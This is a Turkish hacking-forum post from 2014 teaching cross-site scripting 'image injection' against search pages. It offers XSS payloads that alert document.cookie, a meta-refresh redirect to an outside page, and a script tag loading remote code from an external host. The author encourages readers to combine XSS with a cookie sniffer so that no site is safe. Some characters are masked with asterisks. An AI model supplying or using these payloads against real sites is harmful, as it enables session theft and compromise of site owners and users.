THT DUYURU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

chat
Seçenekler

Xss İmage İnjection / S4cuRıTy EneMy

S4cuRiTy EneMy - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
04/2012
Nereden:
root@server
Yaş:
24
Mesajlar:
8.779
Konular:
1513
Teşekkür (Etti):
968
Teşekkür (Aldı):
3105
Ticaret:
(0) %
27-05-2014 19:31
#1
Xss İmage İnjection / S4cuRıTy EneMy
Merhaba arkadaşlar, bugün sizlere döküman halinde xss image injection nedir nasil kullanılır bu konu hakkında kısa öz bilgiler verecegim..

Öncellikle xss'yi kimse küçümseyip lamer işi v.s demesin dünyanın en tehlikeli açıklarında 7. sırada gelmektedir

1-) Xss Nerelerde Oluşmaktadır ?

[+] Xss, takvim ve arama yani search dosyalarında sıklık ile oluşmaktadır bunun sebebi ise örnegin html ile arama kısmını ele alalım tamamen bug res. ile ilgilidir eğer ki kodlarda filtreleme uygulanamamış yada special html kullanılmadıysa ciddi xss açıgı oluşabilir biz burada şimdi xss ile resim ekrana vurdurmayı gösterecegiz..

Örnegin biz böyle bir dosya arasak

Alıntı:
www.turkhackteam. net/ arama?detay=yenifoto
Biz buna alert vermek istesek ;

Alıntı:
**********alert('S4cuRiTy')</script>
Alert verdigini farz ediyorum eğer alert verdiyse image yani resim enjekte edersek bakalım ne olucak

Alıntı:
www.turkhackteam. net/ arama?detay=hizliresim.com/s4curity.png
resim yolumuzu belirttim ve onay verdim %70 server'e bağlı olarak resimi enjekte edicektir.

Evet image enjekte edildi ama bir'de **** deneyin berki işe yariyabilir.

Alıntı:
<m e t a http-equiv="*******" content="0;URL=http://www.turkhackteam.net/hekid.html">
Evet bu konumuz buraya kadar ama size tavsiyem xss ile kendini donatırsanız en kotu sniffer yedirerek hackleyemeyecegiz site yoktur. Örnek olarak xss kodları vericem sizlere ;

Alıntı:
">**********alert(********.cookie)</script>
">**********alert(1)</script>
Aynı zamanda kolay bir resim ekleme yani image enjekte edilmiş xss kodu

Kod:
<SCRIPT src= "http://turkhackteam.net/s4.png"></SCRIPT>
Selametle // S4cuRıTy EneMy

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler